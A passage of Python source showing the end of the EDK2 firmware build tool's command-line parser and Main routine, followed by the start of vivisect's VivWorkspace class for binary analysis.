action="append")
Parser.add_option("-t", "--tagname", action="append", type="string", dest="ToolChain",
help="Using the Tool Chain Tagname to build the platform, overriding target.txt's TOOL_CHAIN_TAG definition.")
Parser.add_option("-x", "--sku-id", action="callback", type="string", dest="SkuId", callback=SingleCheckCallback,
help="Using this name of SKU ID to build the platform, overriding SKUID_IDENTIFIER in DSC file.")
Parser.add_option("-n", action="callback", type="int", dest="ThreadNumber", callback=SingleCheckCallback,
help="Build the platform using multi-threaded compiler. The value overrides target.txt's MAX_CONCURRENT_THREAD_NUMBER. When value is set to 0, tool automatically detect number of "\
"processor threads, set value to 1 means disable multi-thread build, and set value to more than 1 means user specify the threads number to build.")
Parser.add_option("-f", "--fdf", action="callback", type="string", dest="FdfFile", callback=SingleCheckCallback,
help="The name of the FDF file to use, which overrides the setting in the DSC file.")
Parser.add_option("-r", "--rom-image", action="append", type="string", dest="RomImage", default=[],
help="The name of FD to be generated. The name must be from [FD] section in FDF file.")
Parser.add_option("-i", "--fv-image", action="append", type="string", dest="FvImage", default=[],
help="The name of FV to be generated. The name must be from [FV] section in FDF file.")
Parser.add_option("-C", "--capsule-image", action="append", type="string", dest="CapName", default=[],
help="The name of Capsule to be generated. The name must be from [Capsule] section in FDF file.")
Parser.add_option("-u", "--skip-autogen", action="store_true", dest="SkipAutoGen", help="Skip AutoGen step.")
Parser.add_option("-e", "--re-parse", action="store_true", dest="Reparse", help="Re-parse all meta-data files.")
Parser.add_option("-c", "--case-insensitive", action="store_true", dest="CaseInsensitive", default=False, help="Don't check case of file name.")
Parser.add_option("-w", "--warning-as-error", action="store_true", dest="WarningAsError", help="Treat warning in tools as error.")
Parser.add_option("-j", "--log", action="store", dest="LogFile", help="Put log in specified file as well as on console.")
Parser.add_option("-s", "--silent", action="store_true", type=None, dest="SilentMode",
help="Make use of silent mode of (n)make.")
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
"including library instances selected, final dependency expression, "\
"and warning messages, etc.")
Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
Parser.add_option("-y", "--report-file", action="store", dest="ReportFile", help="Create/overwrite the report to the specified filename.")
Parser.add_option("-Y", "--report-type", action="append", type="choice", choices=['PCD','LIBRARY','FLASH','DEPEX','BUILD_FLAGS','FIXED_ADDRESS','HASH','EXECUTION_ORDER'], dest="ReportType", default=[],
help="Flags that control the type of build report to generate. Must be one of: [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS, HASH, EXECUTION_ORDER]. "\
"To specify more than one flag, repeat this option on the command line and the default flag set is [PCD, LIBRARY, FLASH, DEPEX, HASH, BUILD_FLAGS, FIXED_ADDRESS]")
Parser.add_option("-F", "--flag", action="store", type="string", dest="Flag",
help="Specify the specific option to parse EDK UNI file. Must be one of: [-c, -s]. -c is for EDK framework UNI file, and -s is for EDK UEFI UNI file. "\
"This option can also be specified by setting *_*_*_BUILD_FLAGS in [BuildOptions] section of platform DSC. If they are both specified, this value "\
"will override the setting in [BuildOptions] section of platform DSC.")
Parser.add_option("-N", "--no-cache", action="store_true", dest="DisableCache", default=False, help="Disable build cache mechanism")
Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
Parser.add_option("--check-usage", action="store_true", dest="CheckUsage", default=False, help="Check usage content of entries listed in INF file.")
Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus to a binary build and ignore all source files")
Parser.add_option("--pcd", action="append", dest="OptionPcd", help="Set PCD value by command line. Format: \"PcdName=Value\" ")
Parser.add_option("-l", "--cmd-len", action="store", type="int", dest="CommandLength", help="Specify the maximum line length of build command. Default is 4096.")
Parser.add_option("--hash", action="store_true", dest="UseHashCache", default=False, help="Enable hash-based caching during build process.")
Parser.add_option("--binary-destination", action="store", type="string", dest="BinCacheDest", help="Generate a cache of binary files in the specified directory.")
Parser.add_option("--binary-source", action="store", type="string", dest="BinCacheSource", help="Consume a cache of binary files from the specified directory.")
Parser.add_option("--genfds-multi-thread", action="store_true", dest="GenfdsMultiThread", default=False, help="Enable GenFds multi thread to generate ffs file.")
(Opt, Args) = Parser.parse_args()
return (Opt, Args)
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
def Main():
StartTime = time.time()
# Initialize log system
EdkLogger.Initialize()
GlobalData.gCommand = sys.argv[1:]
#
# Parse the options and args
#
(Option, Target) = MyOptionParser()
GlobalData.gOptions = Option
GlobalData.gCaseInsensitive = Option.CaseInsensitive
# Set log level
if Option.verbose is not None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
elif Option.quiet is not None:
EdkLogger.SetLevel(EdkLogger.QUIET)
elif Option.debug is not None:
EdkLogger.SetLevel(Option.debug + 1)
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if Option.LogFile is not None:
EdkLogger.SetLogFile(Option.LogFile)
if Option.WarningAsError == True:
EdkLogger.SetWarningAsError()
if platform.platform().find("Windows") >= 0:
GlobalData.gIsWindows = True
else:
GlobalData.gIsWindows = False
EdkLogger.quiet("Build environment: %s" % platform.platform())
EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
ReturnCode = 0
MyBuild = None
BuildError = True
try:
if len(Target) == 0:
Target = "all"
elif len(Target) >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
else:
Target = Target[0].lower()
if Target not in gSupportedTarget:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
#
# Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
#
CheckEnvVariable()
GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
Workspace = os.getenv("WORKSPACE")
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = Utils.DirCache(Workspace)
WorkingDirectory = os.getcwd()
if not Option.ModuleFile:
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
elif FileNum == 1:
Option.ModuleFile = NormFile(FileList[0], Workspace)
if Option.ModuleFile:
if os.path.isabs (Option.ModuleFile):
if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.PlatformFile is not None:
if os.path.isabs (Option.PlatformFile):
if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
if Option.FdfFile is not None:
if os.path.isabs (Option.FdfFile):
if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
Option.FdfFile = PathClass(Option.FdfFile, Workspace)
ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.Flag is not None and Option.Flag not in ['-c', '-s']:
EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
MyBuild = Build(Target, Workspace, Option)
GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
if not (MyBuild.LaunchPrebuildFlag and os.path.exists(MyBuild.PlatformBuildPath)):
MyBuild.Launch()
# Drop temp tables to avoid database locked.
for TmpTableName in TmpTableDict:
SqlCommand = """drop table IF EXISTS %s""" % TmpTableName
TmpTableDict[TmpTableName].execute(SqlCommand)
#MyBuild.DumpBuildData()
#
# All job done, no error found and no exception raised
#
BuildError = False
except FatalError, X:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = X.args[0]
except Warning, X:
# error from Fdf parser
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
else:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
ReturnCode = FORMAT_INVALID
except KeyboardInterrupt:
ReturnCode = ABORT_ERROR
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
except:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
# try to get the meta-file from the object causing exception
Tb = sys.exc_info()[-1]
MetaFile = GlobalData.gProcessingFile
while Tb is not None:
if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
Tb = Tb.tb_next
EdkLogger.error(
"\nbuild",
CODE_ERROR,
"Unknown fatal error when processing [%s]" % MetaFile,
ExtraData="\n(Please send email to edk2-devel@lists.01.org for help, attaching following call stack trace!)\n",
RaiseError=False
)
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
Utils.Progressor.Abort()
Utils.ClearDuplicatedInf()
if ReturnCode == 0:
try:
MyBuild.LaunchPostbuild()
Conclusion = "Done"
except:
Conclusion = "Failed"
elif ReturnCode == ABORT_ERROR:
Conclusion = "Aborted"
else:
Conclusion = "Failed"
FinishTime = time.time()
BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
BuildDurationStr = ""
if BuildDuration.tm_yday > 1:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)" % (BuildDuration.tm_yday - 1)
else:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
if MyBuild is not None:
if not BuildError:
MyBuild.BuildReport.GenerateReport(BuildDurationStr, LogBuildTime(MyBuild.AutoGenTime), LogBuildTime(MyBuild.MakeTime), LogBuildTime(MyBuild.GenFdsTime))
MyBuild.Db.Close()
EdkLogger.SetLevel(EdkLogger.QUIET)
EdkLogger.quiet("\n- %s -" % Conclusion)
EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
return ReturnCode
if __name__ == '__main__':
r = Main()
## 0-127 is a safe return range, and 1 is a standard default error
if r < 0 or r > 127: r = 1
sys.exit(r)
|
__init__.py | """
Yay! It's NOT IDA!!!1!!1!one!
"""
import os
import re
import sys
import time
import queue
import string
import hashlib
import logging
import binascii
import itertools
import traceback
import threading
import collections
import envi
import envi.exc as e_exc
import envi.bits as e_bits
import envi.common as e_common
import envi.memory as e_mem
import envi.config as e_config
import envi.bytesig as e_bytesig
import envi.symstore.resolver as e_resolv
import envi.symstore.symcache as e_symcache
import vstruct
import vstruct.cparse as vs_cparse
import vstruct.primitives as vs_prims
import vivisect.base as viv_base
import vivisect.parsers as viv_parsers
import vivisect.codegraph as viv_codegraph
import vivisect.impemu.lookup as viv_imp_lookup
from vivisect.exc import *
from vivisect.const import *
from vivisect.defconfig import *
import vivisect.analysis.generic.emucode as v_emucode
logger = logging.getLogger(__name__)
STOP_LOCS = (LOC_STRING, LOC_UNI, LOC_STRUCT, LOC_CLSID, LOC_VFTABLE, LOC_IMPORT, LOC_PAD, LOC_NUMBER)
STORAGE_MAP = {
'viv': 'vivisect.storage.basicfile',
'mpviv': 'vivisect.storage.mpfile',
}
def guid(size=16):
return binascii.hexlify(os.urandom(size))
class VivWorkspace(e_mem.MemoryObject, viv_base.VivWorkspaceCore):
'''
VivWorkspace is the heart of vivisect's binary analysis. Most APIs accept a VivWorkspace
as their first parameter, and the workspace is responsible for all the user facing functions
of getters/adders, running analysis passes, making the various locations, loading files, and
more.
Current keyword arguments:
* confdir:
* Type: String (path to directory)
* Description: A path to a directory to save/load vivisect's analysis configuration options (options will be saved to/loaded from the viv.json file in the directory
* Default: $HOME/.viv/
* autosave (boolean):
* Type: Boolean
* Description: If true, autosave any configuration changes to the <confdir>/viv.json upon changing them.
* Default: False
'''
def __init__(self, **kwargs):
e_mem.MemoryObject.__init__(self)
viv_base.VivWorkspaceCore.__init__(self)
autosave = kwargs.get('autosave', False)
cfgdir = kwargs.get('confdir', None)
if cfgdir:
self.vivhome = os.path.abspath(cfgdir)
else:
self.vivhome = e_config.gethomedir(".viv", makedir=autosave)
self._viv_gui = None # If a gui is running, he will put a ref here...
self._ext_ctxmenu_hooks = {}
self._extensions = {}
self.saved = False # TODO: Have a warning when we try to close the UI if the workspace hasn't been saved
self.rchan = None
self.server = None
self.chanids = itertools.count()
self.arch = None # The placeholder for the Envi architecture module
self.psize = None # Used so much, optimization is appropriate
cfgpath = os.path.join(self.vivhome, 'viv.json')
self.config = e_config.EnviConfig(filename=cfgpath, defaults=defconfig, docs=docconfig, autosave=autosave)
# Ideally, *none* of these are modified except by _handleFOO funcs...
self.segments = []
self.exports = []
self.imports = []
self.codeblocks = []
self.relocations = []
self._dead_data = []
self.iscode = {}
self.xrefs = []
self.xrefs_by_to = {}
self.xrefs_by_from = {}
# XXX - make config option
self.greedycode = 0
self.metadata = {}
self.comments = {} # Comment by VA.
self.symhints = {}
self.filemeta = {} # Metadata Dicts stored by filename
self.transmeta = {} # Metadata that is *not* saved/evented
self.cfctx = viv_base.VivCodeFlowContext(self)
self.va_by_name = {}
self.name_by_va = {}
self.codeblocks_by_funcva = {}
self.exports_by_va = {}
self.colormaps = {}
self.vasetdefs = {}
self.vasets = {}
self.reloc_by_va = {}
self.func_args = {}
self.funcmeta = {} # Function metadata stored in the workspace
self.frefs = {}
# Extended analysis modules
self.amods = {}
self.amodlist = []
# Extended *function* analysis modules
self.fmods = {}
self.fmodlist = []
self.chan_lookup = {}
self.nextchanid = 1
self._cached_emus = {}
# The function entry signature decision tree
# FIXME add to export
self.sigtree = e_bytesig.SignatureTree()
self.siglist = []
self._op_cache = {}
self._initEventHandlers()
# Some core meta types that exist
self.setMeta('NoReturnApis', {})
self.setMeta('SymbolikImportEmulation', None)
# Default to basic file storage
self.setMeta("StorageModule", "vivisect.storage.basicfile")
# There are a few default va sets for use in analysis
self.addVaSet('EntryPoints', (('va', VASET_ADDRESS),))
self.addVaSet('NoReturnCalls', (('va', VASET_ADDRESS),))
self.addVaSet("Emulation Anomalies", (("va", VASET_ADDRESS), ("Message", VASET_STRING)))
self.addVaSet("Bookmarks", (("va", VASET_ADDRESS), ("Bookmark Name", VASET_STRING)))
self.addVaSet('DynamicBranches', (('va', VASET_ADDRESS), ('opcode', VASET_STRING), ('bflags', VASET_INTEGER)))
self.addVaSet('SwitchCases', (('va', VASET_ADDRESS), ('setup_va', VASET_ADDRESS), ('Cases', VASET_INTEGER)))
self.addVaSet('PointersFromFile', (('va', VASET_ADDRESS), ('target', VASET_ADDRESS), ('file', VASET_STRING), ('comment', VASET_STRING), ))
self.addVaSet('CodeFragments', (('va', VASET_ADDRESS), ('calls_from', VASET_COMPLEX)))
self.addVaSet('EmucodeFunctions', (('va', VASET_ADDRESS),))
self.addVaSet('FuncWrappers', (('va', VASET_ADDRESS), ('wrapped_va', VASET_ADDRESS),))
def vprint(self, msg):
logger.info(msg)
def getVivGui(self):
'''
Return a reference to the vivisect GUI object for this workspace. If
the GUI is not running (aka, the workspace is being used programatically)
this routine returns None.
Example:
vwgui = vw.getVivGui()
if vwgui:
vwgui.doStuffAndThings()
'''
return self._viv_gui
def addCtxMenuHook(self, name, handler):
'''
Extensions can add Context Menu hooks to modify the menu as they wish.
This would most often happen from the Extension's vivExtension() init function.
see vivisect.qt.ctxmenu for more details
handler should have the following prototype (inc. example code):
from vqt.common import ACT
def myExtCtxMenuHandler(vw, menu):
toymenu = menu.addMenu('myToys')
toymenu.addAction('Voodoo Wizbang ZeroDay Finder Thingy', ACT(doCoolShit, vw, va))
Currently, this should live in a loaded module, not in your Viv Extension's main py file.
'''
if name in self._ext_ctxmenu_hooks:
cur = self._ext_ctxmenu_hooks[name]
logger.warning("Attempting to hook the context menu: %r is already registered \
(cur: %r new: %r)", name, cur, handler)
return
self._ext_ctxmenu_hooks[name] = handler
def delCtxMenuHook(self, name):
'''
Remove a context-menu hook that has been installed by an extension
'''
self._ext_ctxmenu_hooks.pop(name, None)
def addExtension(self, name, extmod):
'''
Add extension module to a list of extensions.
This keeps a list of installed extension modules, with the added value
of keeping the loaded module in memory.
'''
if name in self._extensions:
cur = self._extensions[name]
logger.warning("Attempting to register an extension: %r is already registered \
(cur: %r new: %r)", name, cur, handler)
return
self._extensions[name] = extmod
def delExtension(self, name):
'''
Remove's extension module from the list of extensions.
'''
self._extensions.pop(name, None)
def getVivGuid(self):
'''
Return the GUID for this workspace. Every newly created VivWorkspace
should have a unique GUID, for identifying a particular workspace for
a given binary/process-space versus another created at a different
time. Filesystem-copies of the same workspace will have the same GUID
by design. This easily allows for workspace-specific GUI layouts as
well as comparisons of Server-based workspaces to the original file-
based workspace used to store to the server.
'''
vivGuid = self.getMeta('GUID')
if vivGuid is None:
vivGuid = guid()
self.setMeta('GUID', vivGuid)
return vivGuid
def loadWorkspace(self, wsname):
mname = self.getMeta("StorageModule")
mod = self.loadModule(mname)
mod.loadWorkspace(self, wsname)
self.setMeta("StorageName", wsname)
# The event list thusfar came *only* from the load...
self._createSaveMark()
# Snapin our analysis modules
self._snapInAnalysisModules()
def addFref(self, fva, va, idx, val):
"""
Add a reference from the operand at virtual address 'va'
index 'idx' to a function local offset. Positive values
(beginning with 0) are considered argument references. Negative
values are considered function local storage and are relative to
the stack pointer at function entry.
"""
# FIXME this should probably be an argument
r = (va, idx, val)
self._fireEvent(VWE_ADDFREF, r)
def getFref(self, va, idx):
"""
Get back the fref value (or None) for the given operand index
from the instruction at va.
"""
return self.frefs.get((va, idx))
def getEmulator(self, **kwargs):
"""
Get an instance of a WorkspaceEmulator for this workspace.
Use logread/logwrite to enable memory access tracking.
"""
plat = self.getMeta('Platform')
arch = self.getMeta('Architecture')
eclass = viv_imp_lookup.workspace_emus.get((plat, arch))
if eclass is None:
eclass = viv_imp_lookup.workspace_emus.get(arch)
if eclass is None:
raise Exception("WorkspaceEmulation not supported on %s yet!" % arch)
emu = eclass(self, **kwargs)
emu.setEndian(self.getEndian())
return emu
def getCachedEmu(self, emuname):
"""
Get a cached emulator by name. If one doesn't exist it is
created and then cached.
"""
emu = self._cached_emus.get(emuname)
if emu is None:
emu = self.getEmulator()
self._cached_emus[emuname] = emu
return emu
def addLibraryDependancy(self, libname):
"""
Add a *normalized* library name to the import search
chain for this binary. This is only needed for formats
whose imports don't explicitly state their library name.
"""
# FIXME this needs to be event enabled... either plumb it special,
# or allow the get/append/set race...
dl = self.getMeta("DepLibs", None)
if dl is None:
dl = []
dl.append(libname)
self.setMeta("DepLibs", dl)
def getLibraryDependancies(self):
'''
Retrieve the list of *normalized* library dependancies.
'''
dl = self.getMeta("DepLibs", None)
if dl is None:
return []
return list(dl)
def setComment(self, va, comment, check=False):
'''
Set the humon readable comment for a given virtual.
Comments will be displayed by the code renderer, and
are an important part of this balanced breakfast.
Example:
vw.setComment(callva, "This actually calls FOO...")
'''
if check and self.comments.get(va):
return
self._fireEvent(VWE_COMMENT, (va, comment))
def getComment(self, va):
'''
Returns the comment string (or None) for a given
virtual address.
Example:
cmnt = vw.getComment(va)
print('COMMENT: %s' % cmnt)
'''
return self.comments.get(va)
def getComments(self):
'''
Retrieve all the comments in the viv workspace as
(va, cmnt) tuples.
Example:
for va,cmnt in vw.getComments():
print('Comment at 0x%.8x: %s' % (va, cmnt))
'''
return list(self.comments.items())
def addRelocation(self, va, rtype, data=None):
"""
Add a relocation entry for tracking.
Expects data to have whatever is necessary for the reloc type. eg. addend
"""
# split "current" va into fname and offset. future relocations will want to base all va's from an image base
mmva, mmsz, mmperm, fname = self.getMemoryMap(va) # FIXME: getFileByVa does not obey file defs
imgbase = self.getFileMeta(fname, 'imagebase')
offset = va - imgbase
self._fireEvent(VWE_ADDRELOC, (fname, offset, rtype, data))
def getRelocations(self):
"""
Get the current list of relocation entries.
"""
return self.relocations
def getRelocation(self, va):
"""
Return the type of relocation at the specified
VA or None if there isn't a relocation entry for
the address.
"""
return self.reloc_by_va.get(va)
def pointerString(self, va):
return self.arch.pointerString(va)
def getAnalysisModuleNames(self):
return list(self.amodlist)
def getFuncAnalysisModuleNames(self):
return list(self.fmodlist)
def addFunctionSignatureBytes(self, bytez, mask=None):
"""
Add a function signature entry by bytes. This is mostly used by
file parsers/loaders to manually tell the workspace about known
entry signature types.
see envi.bytesig for details.
"""
self.sigtree.addSignature(bytez, mask)
self.siglist.append((bytez, mask))
def isFunctionSignature(self, va):
"""
Check if the specified va is a function entry signature
according to the current entry point signature tree...
"""
if not self.isValidPointer(va):
return False
offset, bytes = self.getByteDef(va)
return self.sigtree.isSignature(bytes, offset=offset)
def addNoReturnVa(self, va):
noretva = self.getMeta('NoReturnApisVa', {})
noretva[va] = True
self.setMeta('NoReturnApisVa', noretva)
self.cfctx.addNoReturnAddr(va)
def addNoReturnApi(self, funcname):
"""
Inform vivisect code-flow disassembly that any call target
which matches the specified name ("funcname" or "libname.funcname"
for imports) does *not* exit and code-flow should be stopped...
"""
funcname = funcname.lower()
m = self.getMeta('NoReturnApis', {})
m[funcname] = True
self.setMeta('NoReturnApis', m)
noretva = self.getMeta('NoReturnApisVa', {})
# If we already have an import entry, we need to update codeflow
for lva, lsize, ltype, linfo in self.getImports():
if linfo.lower() != funcname:
continue
self.cfctx.addNoReturnAddr(lva)
noretva[lva] = True
self.setMeta('NoReturnApisVa', noretva)
def addNoReturnApiRegex(self, funcre):
'''
Inform vivisect code-flow disassembly that any call target
which matches the specified regex ("funcname" or "libname.funcname"
for imports) does *not* exit and code-flow should be stopped...
'''
c = re.compile(funcre, re.IGNORECASE)
m = self.getMeta('NoReturnApisRegex', [])
m.append(funcre)
self.setMeta('NoReturnApisRegex', m)
for lva, lsize, ltype, linfo in self.getImports():
if c.match(linfo):
self.addNoReturnApi(linfo)
def isNoReturnVa(self, va):
'''
Check if a VA is a no return API
'''
isva = self.getMeta('NoReturnApisVa', {}).get(va, False)
iscall = self.getVaSetRow('NoReturnCalls', va) is not None
return isva or iscall
def checkNoRetApi(self, apiname, va):
'''
Called as new APIs (thunks) are discovered, checks to see
if they wrap a NoReturnApi. Updates if it is a no ret API thunk
'''
noretva = self.getMeta('NoReturnApisVa', {})
for funcre in self.getMeta('NoReturnApisRegex', []):
c = re.compile(funcre, re.IGNORECASE)
if c.match(apiname):
self.cfctx.addNoReturnAddr(va)
noretva[va] = True
for funcname in self.getMeta('NoReturnApis', {}).keys():
if funcname.lower() == apiname.lower():
self.cfctx.addNoReturnAddr(va)
noretva[va] = True
self.setMeta('NoReturnApisVa', noretva)
def addAnalysisModule(self, modname):
"""
Add an analysis module by python import path
"""
if modname in self.amods:
return
mod = self.loadModule(modname)
self.amods[modname] = mod
self.amodlist.append(modname)
logger.debug('Adding Analysis Module: %s', modname)
def delAnalysisModule(self, modname):
"""
Remove an analysis module from the list used during analysis()
"""
if modname not in self.amods:
raise Exception("Unknown Module in delAnalysisModule: %s" % modname)
x = self.amods.pop(modname, None)
if x is not None:
self.amodlist.remove(modname)
def loadModule(self, modname):
__import__(modname)
return sys.modules[modname]
def addFuncAnalysisModule(self, modname):
"""
Snap in a per-function analysis module (by name) which
will be triggered during the creation of a new function
(makeFunction).
"""
if modname in self.fmods:
return
mod = self.loadModule(modname)
self.fmods[modname] = mod
self.fmodlist.append(modname)
logger.debug('Adding Function Analysis Module: %s', modname)
def delFuncAnalysisModule(self, modname):
'''
Remove a currently registered function analysis module.
Example:
vw.delFuncAnalysisModule('mypkg.mymod')
'''
x = self.fmods.pop(modname, None)
if x is None:
raise Exception("Unknown Module in delAnalysisModule: %s" % modname)
self.fmodlist.remove(modname)
def createEventChannel(self):
chanid = next(self.chanids)
self.chan_lookup[chanid] = queue.Queue()
return chanid
def importWorkspace(self, wsevents):
"""
Import and initialize data from the given vivisect workspace
export.
"""
# During import, if we have a server, be sure not to notify
# the server about the events he just gave us...
local = False
if self.server is not None:
local = True
# Process the events from the import data...
fe = self._fireEvent
for event, einfo in wsevents:
fe(event, einfo, local=local)
return
def exportWorkspace(self):
'''
Return the (probably big) list of events which define this
workspace.
'''
return self._event_list
def exportWorkspaceChanges(self):
'''
Export the list of events which have been applied to the
workspace since the last save.
'''
return self._event_list[self._event_saved:]
def initWorkspaceClient(self, remotevw):
"""
Initialize this workspace as a workspace
client to the given (potentially cobra remote)
workspace object.
"""
uname = e_config.getusername()
self.server = remotevw
self.rchan = remotevw.createEventChannel()
self.server.vprint('%s connecting...' % uname)
wsevents = self.server.exportWorkspace()
self.importWorkspace(wsevents)
self.server.vprint('%s connection complete!' % uname)
thr = threading.Thread(target=self._clientThread)
thr.setDaemon(True)
thr.start()
def _clientThread(self):
"""
The thread that monitors events on a server to stay
in sync.
"""
if self.server is None:
raise Exception("_clientThread() with no server?!?!")
while self.server is not None:
event, einfo = self.server.waitForEvent(self.rchan)
self._fireEvent(event, einfo, local=True)
def waitForEvent(self, chanid, timeout=None):
"""
Return an event,eventinfo tuple.
"""
q = self.chan_lookup.get(chanid)
if q is None:
raise Exception("Invalid Channel")
return q.get(timeout=timeout)
def deleteEventChannel(self, chanid):
"""
Remove a previously allocated event channel from
the workspace.
"""
self.chan_lookup.pop(chanid)
def reprPointer(vw, va):
"""
Do your best to create a humon readable name for the
value of this pointer.
note: This differs from parent function from envi.cli:
* Locations database is checked
* Strings are returned, not named (partially)
* <function> + 0x<offset> is returned if inside a function
* <filename> + 0x<offset> is returned instead of loc_#####
"""
if va == 0:
return "NULL"
loc = vw.getLocation(va)
if loc is not None:
locva, locsz, lt, ltinfo = loc
if lt in (LOC_STRING, LOC_UNI):
return vw.reprVa(locva)
mbase, msize, mperm, mfile = vw.getMemoryMap(va)
ret = mfile + " + 0x%x" % (va - mbase)
sym = vw.getName(va, smart=True)
if sym is not None:
ret = sym
return ret
def reprVa(self, va):
"""
A quick way for scripts to get a string for a given virtual address.
"""
loc = self.getLocation(va)
if loc is not None:
return self.reprLocation(loc)
return "None"
def reprLocation(self, loctup):
if loctup is None:
return 'no loc info'
lva,lsize,ltype,tinfo = loctup
if ltype == LOC_OP:
op = self.parseOpcode(lva, arch=tinfo & envi.ARCH_MASK)
return repr(op)
elif ltype == LOC_STRING:
return repr(self.readMemory(lva, lsize).decode('utf-8'))
elif ltype == LOC_UNI:
# FIXME super ghetto "simple" unicode handling for now
bytes = b''.join(self.readMemory(lva, lsize).split(b'\x00'))
try:
return f"u'%s'" % bytes.decode('utf-8')
except:
return bytes.hex()
elif ltype == LOC_STRUCT:
lstruct = self.getStructure(lva, tinfo)
return repr(lstruct)
elif ltype == LOC_NUMBER:
value = self.parseNumber(lva, lsize)
hexstr = "0x%%.%dx" % lsize
hexstr = hexstr % value
if lsize == 1:
return "BYTE: %d (%s)" % (value, hexstr)
else:
return "%d BYTES: %d (%s)" % (lsize, value, hexstr)
elif ltype == LOC_IMPORT:
return "IMPORT: %s" % tinfo
elif ltype == LOC_POINTER:
return "PTR: %s" % self.arch.pointerString(self.getXrefsFrom(lva)[0][XR_TO])
else:
n = self.getName(lva)
if n is not None:
return n
return binascii.hexlify(self.readMemory(lva, lsize)).decode('utf-8')
def followPointer(self, va):
"""
Do pointer analysis and folllow up the recomendation
by creating locations etc...
"""
ltype = self.analyzePointer(va)
if ltype is None:
return False
# Note, we only implement the types possibly
# returned from analyzePointer...
if ltype == LOC_OP:
# NOTE: currently analyzePointer returns LOC_OP
# based on function entries, lets make a func too...
logger.debug('discovered new function (followPointer(0x%x))', va)
self.makeFunction(va)
return True
elif ltype == LOC_STRING:
self.makeString(va)
return True
elif ltype == LOC_UNI:
self.makeUnicode(va)
return True
return False
def processEntryPoints(self):
'''
Roll through EntryPoints and make them into functions (if not already)
'''
for eva in self.getEntryPoints():
if self.isFunction(eva):
continue
if not self.probeMemory(eva, 1, e_mem.MM_EXEC):
continue
logger.debug('processEntryPoint: 0x%x', eva)
self.makeFunction(eva)
def analyze(self):
"""
Call this to ask any available analysis modules
to do their thing...
"""
self.vprint('Beginning analysis...')
starttime = time.time()
# Now lets engage any analysis modules. If any modules return
# true, they managed to change things and we should run again...
for mname in self.amodlist:
mod = self.amods.get(mname)
self.vprint("Extended Analysis: %s" % mod.__name__)
try:
mod.analyze(self)
except Exception as e:
self.vprint("Extended Analysis Exception %s: %s" % (mod.__name__, e))
endtime = time.time()
self.vprint('...analysis complete! (%d sec)' % (endtime-starttime))
self.printDiscoveredStats()
self._fireEvent(VWE_AUTOANALFIN, (endtime, starttime))
def analyzeFunction(self, fva):
for fmname in self.fmodlist:
